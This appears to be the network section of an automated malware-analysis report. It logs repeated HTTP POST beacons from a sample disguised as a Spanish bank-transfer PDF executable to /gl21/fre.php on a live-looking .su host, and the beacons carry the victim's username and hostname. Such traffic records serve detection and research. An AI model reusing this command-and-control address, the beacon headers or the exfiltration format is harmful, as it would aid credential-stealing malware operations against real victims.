                                      17192.168.2.64972391.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:30:53.367985010 CET126OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Nov 3, 2022 12:30:53.430174112 CET127OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:30:54.557574987 CET127INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:30:54 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 23
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      18192.168.2.64972491.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:30:54.913990974 CET128OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Nov 3, 2022 12:30:55.216989040 CET128OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:30:55.529526949 CET129OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:30:56.139131069 CET129OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:30:57.636605024 CET129INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:30:57 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 23
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      19192.168.2.64972591.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:30:57.918358088 CET130OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Nov 3, 2022 12:30:57.981422901 CET130OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:30:59.345747948 CET131INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:30:59 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 23
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      2192.168.2.64970891.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:30:14.035063982 CET101OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Nov 3, 2022 12:30:14.097431898 CET101OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:30:15.684953928 CET101INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:30:15 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 23
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      20192.168.2.64972691.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:30:59.657450914 CET132OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Nov 3, 2022 12:30:59.719604969 CET132OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:31:00.653287888 CET132INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:31:00 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 23
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      21192.168.2.64972791.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:31:01.987085104 CET133OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Nov 3, 2022 12:31:02.049869061 CET133OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:31:03.547635078 CET134INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:31:03 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 23
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      22192.168.2.64972891.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:31:03.903902054 CET134OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Nov 3, 2022 12:31:03.965487003 CET135OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:31:05.359035969 CET135INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:31:05 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 23
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      23192.168.2.64972991.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:31:05.707381964 CET136OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Nov 3, 2022 12:31:05.770745993 CET136OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:31:07.339015961 CET137INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:31:06 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 23
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      24192.168.2.64973091.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:31:07.626822948 CET137OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Nov 3, 2022 12:31:07.689786911 CET138OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:31:09.196542025 CET138INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:31:08 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 23
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      25192.168.2.64973191.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:31:09.511790991 CET139OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Nov 3, 2022 12:31:09.574201107 CET139OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:31:10.691873074 CET139INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:31:10 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 23
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      26192.168.2.64973291.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:31:20.467945099 CET140OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Nov 3, 2022 12:31:20.530344963 CET141OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:31:21.820409060 CET141INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:31:21 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 23
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      27192.168.2.64973391.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:31:22.614964008 CET142OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Nov 3, 2022 12:31:22.906861067 CET142OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:31:23.219305992 CET142OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:31:25.021801949 CET143INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:31:24 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 23
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      28192.168.2.64973491.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:31:25.377975941 CET144OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Nov 3, 2022 12:31:25.440109015 CET144OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:31:25.735219002 CET144OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:31:27.178864956 CET144INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:31:26 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 23
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      29192.168.2.64973591.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:31:27.516452074 CET145OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Nov 3, 2022 12:31:27.582582951 CET146OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:31:28.883670092 CET146INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:31:28 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 23
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      3192.168.2.64970991.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:30:16.075566053 CET102OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Nov 3, 2022 12:30:16.137861967 CET103OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:30:17.656419039 CET103INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:30:17 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 23
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      30192.168.2.64973691.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:31:29.221112013 CET147OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Nov 3, 2022 12:31:29.283785105 CET147OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Nov 3, 2022 12:31:30.738261938 CET147INHTTP/1.0 404 Not Found
                                      Date: Thu, 03 Nov 2022 11:31:30 GMT
                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                      X-Powered-By: PHP/5.4.16
                                      Status: 404 Not Found
                                      Content-Length: 23
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      31192.168.2.64973791.142.77.4580C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 3, 2022 12:31:31.046497107 CET148OUTPOST /gl21/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: sempersim.su
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 79F54F54
                                      Content-Length: 169
                                      Connection: close
                                      Nov 3, 2022 12:31:31.108310938 CET148OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                      Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
